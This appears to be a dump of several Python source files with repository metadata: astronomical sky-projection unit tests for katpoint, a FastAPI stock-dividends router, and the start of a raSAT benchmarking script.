assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 2.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 2.0)
class TestProjectionTAN(unittest.TestCase):
"""Test gnomonic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['TAN']
self.sphere_to_plane = katpoint.sphere_to_plane['TAN']
N = 100
# Stay away from edge of hemisphere
max_theta = np.pi / 2.0 - 0.01
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
# Perform inverse TAN mapping to spread out points on plane
self.x = np.tan(theta) * np.cos(phi)
self.y = np.tan(theta) * np.sin(phi)
def test_random_closure(self):
"""TAN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=8)
np.testing.assert_almost_equal(self.y, yy, decimal=8)
assert_angles_almost_equal(az, aa, decimal=8)
assert_angles_almost_equal(el, ee, decimal=8)
def test_aips_compatibility(self):
"""TAN projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
# AIPS TAN only deprojects (x, y) coordinates within unit circle
r = self.x * self.x + self.y * self.y
az0, el0 = self.az0[r <= 1.0], self.el0[r <= 1.0]
x, y = self.x[r <= 1.0], self.y[r <= 1.0]
az, el = self.plane_to_sphere(az0, el0, x, y)
xx, yy = self.sphere_to_plane(az0, el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
        for n in range(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(3, az0[n], el0[n], x[n], y[n])
x_aips[n], y_aips[n], ierr = \
dircos(3, az0[n], el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=10)
assert_angles_almost_equal(el, el_aips, decimal=10)
np.testing.assert_almost_equal(xx, x_aips, decimal=10)
np.testing.assert_almost_equal(yy, y_aips, decimal=10)
def test_corner_cases(self):
"""TAN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 45 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 4.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 4.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, np.pi / 4.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 4.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 4.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 4.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 4.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [np.pi, -np.pi / 4.0], decimal=12)
class TestProjectionARC(unittest.TestCase):
"""Test zenithal equidistant projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['ARC']
self.sphere_to_plane = katpoint.sphere_to_plane['ARC']
N = 100
# Stay away from edge of circle
max_theta = np.pi - 0.01
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within circle of radius pi
theta = max_theta * np.random.rand(N)
phi = 2 * np.pi * np.random.rand(N)
self.x = theta * np.cos(phi)
self.y = theta * np.sin(phi)
def test_random_closure(self):
"""ARC projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=8)
np.testing.assert_almost_equal(self.y, yy, decimal=8)
assert_angles_almost_equal(az, aa, decimal=8)
assert_angles_almost_equal(el, ee, decimal=8)
def test_aips_compatibility(self):
"""ARC projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
        for n in range(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(4, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(4, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
assert_angles_almost_equal(az, az_aips, decimal=8)
assert_angles_almost_equal(el, el_aips, decimal=8)
np.testing.assert_almost_equal(xx, x_aips, decimal=8)
np.testing.assert_almost_equal(yy, y_aips, decimal=8)
def test_corner_cases(self):
"""ARC projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, np.pi / 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -np.pi / 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 0.0))
np.testing.assert_almost_equal(xy, [0.0, np.pi / 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [np.pi / 2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-np.pi / 2.0, 0.0], decimal=12)
# Point diametrically opposite the reference point on sphere
xy = np.array(self.sphere_to_plane(np.pi, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(np.abs(xy), [np.pi, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [1.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [-1.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 1.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, -1.0], decimal=12)
# Points on circle with radius pi in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, np.pi, 0.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -np.pi, 0.0))
assert_angles_almost_equal(ae, [-np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, np.pi))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -np.pi))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, np.pi / 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -np.pi / 2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, np.pi / 2.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -np.pi / 2.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 4.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 4.0)
class TestProjectionSTG(unittest.TestCase):
"""Test stereographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['STG']
self.sphere_to_plane = katpoint.sphere_to_plane['STG']
N = 100
# Stay well away from point of projection
max_theta = 0.8 * np.pi
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# Perform inverse STG mapping to spread out points on plane
theta = max_theta * np.random.rand(N)
r = 2.0 * np.sin(theta) / (1.0 + np.cos(theta))
phi = 2 * np.pi * np.random.rand(N)
self.x = r * np.cos(phi)
self.y = r * np.sin(phi)
def test_random_closure(self):
"""STG projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=9)
np.testing.assert_almost_equal(self.y, yy, decimal=9)
assert_angles_almost_equal(az, aa, decimal=9)
assert_angles_almost_equal(el, ee, decimal=9)
def test_aips_compatibility(self):
"""STG projection: compare with original AIPS routine."""
if not found_aips:
skip("AIPS projection module not found")
return
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
az_aips, el_aips = np.zeros(az.shape), np.zeros(el.shape)
x_aips, y_aips = np.zeros(xx.shape), np.zeros(yy.shape)
        for n in range(len(az)):
az_aips[n], el_aips[n], ierr = \
newpos(6, self.az0[n], self.el0[n], self.x[n], self.y[n])
x_aips[n], y_aips[n], ierr = \
dircos(6, self.az0[n], self.el0[n], az[n], el[n])
self.assertEqual(ierr, 0)
# AIPS NEWPOS STG has poor accuracy on azimuth angle (large closure errors by itself)
# assert_angles_almost_equal(az, az_aips, decimal=9)
assert_angles_almost_equal(el, el_aips, decimal=9)
np.testing.assert_almost_equal(xx, x_aips, decimal=9)
np.testing.assert_almost_equal(yy, y_aips, decimal=9)
def test_corner_cases(self):
"""STG projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -2.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, -2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 2.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [2.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-2.0, 0.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on circle of radius 2.0 in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 2.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -2.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 2.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, -2.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, 2.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -2.0))
assert_angles_almost_equal(ae, [np.pi, 0.0], decimal=12)
class TestProjectionCAR(unittest.TestCase):
"""Test plate carree projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['CAR']
self.sphere_to_plane = katpoint.sphere_to_plane['CAR']
N = 100
# Unrestricted (az0, el0) points on sphere
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
self.el0 = np.pi * (np.random.rand(N) - 0.5)
# Unrestricted (x, y) points on corresponding plane
self.x = np.pi * (2.0 * np.random.rand(N) - 1.0)
self.y = np.pi * (np.random.rand(N) - 0.5)
def test_random_closure(self):
"""CAR projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=12)
np.testing.assert_almost_equal(self.y, yy, decimal=12)
assert_angles_almost_equal(az, aa, decimal=12)
assert_angles_almost_equal(el, ee, decimal=12)
def sphere_to_plane_mattieu(targetaz, targetel, scanaz, scanel):
    # Produces direction-cosine coordinates (ll, mm) from the scanning
    # antenna's (azimuth, elevation) coordinates.
    # See _coordinate options.py for the derivation.
    ll = np.cos(targetel) * np.sin(targetaz - scanaz)
    mm = np.cos(targetel) * np.sin(scanel) * np.cos(targetaz - scanaz) - np.cos(scanel) * np.sin(targetel)
    return ll, mm
def plane_to_sphere_mattieu(targetaz, targetel, ll, mm):
    scanaz = targetaz - np.arcsin(np.clip(ll / np.cos(targetel), -1.0, 1.0))
    scanel = np.arcsin(np.clip((np.sqrt(1.0 - ll ** 2 - mm ** 2) * np.sin(targetel)
                                + np.sqrt(np.cos(targetel) ** 2 - ll ** 2) * mm) / (1.0 - ll ** 2), -1.0, 1.0))
    # Alternate equations which give the same result:
    # scanel_alternate1 = np.arcsin((np.sqrt(1.0 - ll**2 - mm**2) * np.sin(targetel) + np.cos(targetel) * np.cos(targetaz - scanaz) * mm) / (1.0 - ll**2))
    # num = np.cos(targetel) * np.cos(targetaz - scanaz)  # or num = np.sqrt(np.cos(targetel)**2 - ll**2)
    # den = np.sin(targetel)**2 + num**2
    # scanel_alternate2 = np.arcsin((np.sqrt(((den - mm**2) * (den - num**2))) + num * mm) / den)
    return scanaz, scanel
class TestProjectionSSN(unittest.TestCase):
"""Test swapped orthographic projection."""
def setUp(self):
self.plane_to_sphere = katpoint.plane_to_sphere['SSN']
self.sphere_to_plane = katpoint.sphere_to_plane['SSN']
N = 100
self.az0 = np.pi * (2.0 * np.random.rand(N) - 1.0)
# Keep away from poles (leave them as corner cases)
self.el0 = 0.999 * np.pi * (np.random.rand(N) - 0.5)
# (x, y) points within complicated SSN domain - clipped unit circle
cos_el0 = np.cos(self.el0)
# The x coordinate is bounded by +- cos(el0)
self.x = (2 * np.random.rand(N) - 1) * cos_el0
# The y coordinate ranges between two (semi-)circles centred on origin:
# the unit circle on one side and circle of radius cos(el0) on other side
y_offset = -np.sqrt(cos_el0 ** 2 - self.x ** 2)
y_range = -y_offset + np.sqrt(1.0 - self.x ** 2)
self.y = (y_range * np.random.rand(N) + y_offset) * np.sign(self.el0)
def test_random_closure(self):
"""SSN projection: do random projections and check closure."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
xx, yy = self.sphere_to_plane(self.az0, self.el0, az, el)
aa, ee = self.plane_to_sphere(self.az0, self.el0, xx, yy)
np.testing.assert_almost_equal(self.x, xx, decimal=10)
np.testing.assert_almost_equal(self.y, yy, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_vs_mattieu(self):
"""SSN projection: compare against Mattieu's original version."""
az, el = self.plane_to_sphere(self.az0, self.el0, self.x, self.y)
ll, mm = sphere_to_plane_mattieu(self.az0, self.el0, az, el)
aa, ee = plane_to_sphere_mattieu(self.az0, self.el0, ll, mm)
np.testing.assert_almost_equal(self.x, ll, decimal=10)
np.testing.assert_almost_equal(self.y, -mm, decimal=10)
assert_angles_almost_equal(az, aa, decimal=10)
assert_angles_almost_equal(el, ee, decimal=10)
def test_corner_cases(self):
"""SSN projection: test special corner cases."""
# SPHERE TO PLANE
# Origin
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 0.0], decimal=12)
# Points 90 degrees from reference point on sphere
xy = np.array(self.sphere_to_plane(0.0, 0.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [-1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [1.0, 0.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, -1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, 0.0, 0.0, -np.pi / 2.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
# Reference point at pole on sphere
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, 0.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi, 1e-8))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
xy = np.array(self.sphere_to_plane(0.0, np.pi / 2.0, -np.pi / 2.0, 0.0))
np.testing.assert_almost_equal(xy, [0.0, 1.0], decimal=12)
# Points outside allowed domain on sphere
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, np.pi, 0.0)
self.assertRaises(ValueError, self.sphere_to_plane, 0.0, 0.0, 0.0, np.pi)
# PLANE TO SPHERE
# Origin
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 0.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Points on unit circle in plane
ae = np.array(self.plane_to_sphere(0.0, 0.0, 1.0, 0.0))
assert_angles_almost_equal(ae, [-np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, -1.0, 0.0))
assert_angles_almost_equal(ae, [np.pi / 2.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, 0.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
# Reference point at pole on sphere
ae = np.array(self.plane_to_sphere(0.0, np.pi / 2.0, 0.0, 1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -np.pi / 2.0, 0.0, -1.0))
assert_angles_almost_equal(ae, [0.0, 0.0], decimal=12)
# Test valid (x, y) domain
ae = np.array(self.plane_to_sphere(0.0, 1.0, 0.0, -np.cos(1.0)))
assert_angles_almost_equal(ae, [0.0, np.pi / 2.0], decimal=12)
ae = np.array(self.plane_to_sphere(0.0, -1.0, 0.0, np.cos(1.0)))
assert_angles_almost_equal(ae, [0.0, -np.pi / 2.0], decimal=12)
# Points outside allowed domain in plane
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 2.0, 0.0)
self.assertRaises(ValueError, self.plane_to_sphere, 0.0, 0.0, 0.0, 2.0)
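if __name__ == '__main__':
    # Convenience entry point (an addition, not part of the original module)
    # so the suite can also be run directly with `python test_projection.py`.
    unittest.main()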
| [
"[email protected]"
] | |
e71f2ad4ff01abe55a1af73d50b4b2075d281736 | b2f3b7b3be11a63d5d1ddfea945439402394efe7 | /routers/stock_dividends.py | 867f17a070eb93246f322a74b193cce05c8808cc | [] | no_license | leonardoo/fast_api_stock_bvc | a8a57b9e2e3822c84829a91702ba2ce73c6ff439 | c91b9267360ed0aacd2e98a1da9b1e3b160dc837 | refs/heads/main | 2023-08-13T08:05:41.064300 | 2021-10-08T00:05:14 | 2021-10-08T00:05:14 | 383,130,473 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,012 | py | from typing import List
from datetime import datetime
from fastapi import APIRouter, Depends
from starlette.responses import JSONResponse
from models.stock import Stock
from models.stock_dividends import StockDividends
from models.users import User
from plugins.fastapi_users import fastapi_users
router = APIRouter(
prefix="/dividends",
tags=["dividends"],
)
def get_current_year():
return datetime.now().year
@router.post("/", response_model=StockDividends)
async def create_dividend(dividend: StockDividends, user: User = Depends(fastapi_users.current_user(verified=True))):
stock = await Stock.objects.get_or_none(nemo=dividend.nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
    # Pop the mutable amount fields from the lookup data so repeated posts for
    # the same dividend find the existing row and simply refresh its totals.
    dividend_data = dividend.dict(exclude_unset=True)
    total = dividend_data.pop("total")
    paid_amount = dividend_data.pop("paid_amount")
    dividend_data.pop("nemo")  # the stock is linked via stock_id below instead
dividend_data["ex_dividend_date"] = str(dividend_data["ex_dividend_date"])
dividend_data["paid_at"] = str(dividend_data["paid_at"])
dividend_data["stock_id"] = stock.id
dividend_obj = await StockDividends.objects.get_or_create(**dividend_data)
dividend_obj.total = total
dividend_obj.paid_amount = paid_amount
await dividend_obj.update()
return dividend_obj
@router.get("/", response_model=List[StockDividends])
async def get_list_dividends():
year = get_current_year()
data = StockDividends.objects.filter(paid_at__gte=f"{year}-01-01", paid_at__lt=f"{year+1}-01-01")
data = data.select_related("stock_id")
data = data.order_by("paid_at")
return await data.all()
@router.get("/{nemo}", response_model=List[StockDividends])
async def get_stock_dividends(nemo: str):
stock = await Stock.objects.get_or_none(nemo=nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
data = StockDividends.objects
data = data.filter(stock_id=stock.id)
return await data.all()
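# Example wiring (illustrative sketch; assumes a FastAPI `app` object created
# elsewhere in this project, e.g. in its main module):
#
#     from fastapi import FastAPI
#     app = FastAPI()
#     app.include_router(router)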
| [
"[email protected]"
] | |
30afc63d7c5839fede97f2925e6bbb6f93e81b28 | e65453aecb1b64f75a4a6eee7ca1328984773d5d | /Test/test1.py | 662d8a12291d456ee624881943ae9a53dc213b46 | [] | no_license | huyendtt58/raSAT | 1a9a0a1c05b81877416e82c9c102ae92c6d80931 | b4f7c8995eef71bd099046c761ea19ea904fd18d | refs/heads/master | 2021-01-19T14:27:24.036231 | 2017-02-23T12:36:52 | 2017-02-23T12:36:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,520 | py | import fnmatch
import os
import subprocess
import csv
matches = []
def run(directory, initLowerBound, initUpperBound, initSbox, timeout, resultFile):
    """Run raSAT on every .smt2 benchmark under `directory`, logging to `resultFile`."""
    # Note: initLowerBound/initUpperBound are currently unused; the variable
    # bounds come from the hard-coded `bounds` list inside the main loop.
    lowerBound = initLowerBound
    upperBound = initUpperBound
    #sbox = initSbox
solvedProblems = 0
with open(os.path.join(directory, resultFile), 'wb') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', 'raSATResult', 'EQ', 'NEQ'])
csvfile.close()
